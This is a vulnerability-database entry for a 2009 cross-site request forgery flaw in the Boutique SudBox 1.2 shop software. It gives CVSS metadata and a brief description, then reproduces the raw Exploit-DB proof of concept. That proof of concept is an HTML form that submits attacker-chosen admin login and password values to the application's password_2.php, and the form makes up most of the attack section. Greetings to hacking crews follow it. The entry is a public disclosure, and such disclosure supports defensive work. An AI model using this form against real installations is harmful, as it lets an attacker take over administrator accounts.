header-logo
Suggest Exploit
vendor:
Boutique SudBox
by:
indoushka
7,8
CVSS
HIGH
CSRF
352
CWE
Product Name: Boutique SudBox
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:boutique_sudbox:boutique_sudbox:1.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability

A CSRF vulnerability exists in Boutique SudBox 1.2 which allows an attacker to change the login and password of the admin user. An attacker can craft a malicious HTML page containing a form with the action set to http://localhost/boutique/admin/password_2.php and the parameters admin and motdepasse set to the desired values. When the admin user visits the malicious page, the form will be automatically submitted and the login and password will be changed.

Mitigation:

The application should validate the origin of the request and ensure that the request is coming from a trusted source.
Source

Exploit-DB raw data:

========================================================================================                  
| # Title    : Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability           
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                                   
| # Tested on: windows SP2 Français V.(Pnx2 2.0)       
| # Bug      : CSRF                                                                     
======================      Exploit By indoushka       =================================
 # Exploit  : 
 
 1 - Changer votre Login et Mot de Passe CSRF :
 
<?
?>
<Center>
<form action="http://localhost/boutique/admin/password_2.php" method="post" target='_top'>
<center>
<br><font class='grand'><b>Changer votre Login et Mot de Passe</b></font><br>
	<table border="0">
	<tr>
		<td>Login: </td>
		<td><input type="text" name="admin"></td>
	</tr><tr>
		<td>Mot de passe: </td>
		<td><input type="password" name="motdepasse"></td>
	</tr><tr>
		<td colspan="2"><input type="submit" value="Envoyer"></td>
	</table>
</form>
<?
?>
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com *  www.alkrsan.net * www.mormoroth.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------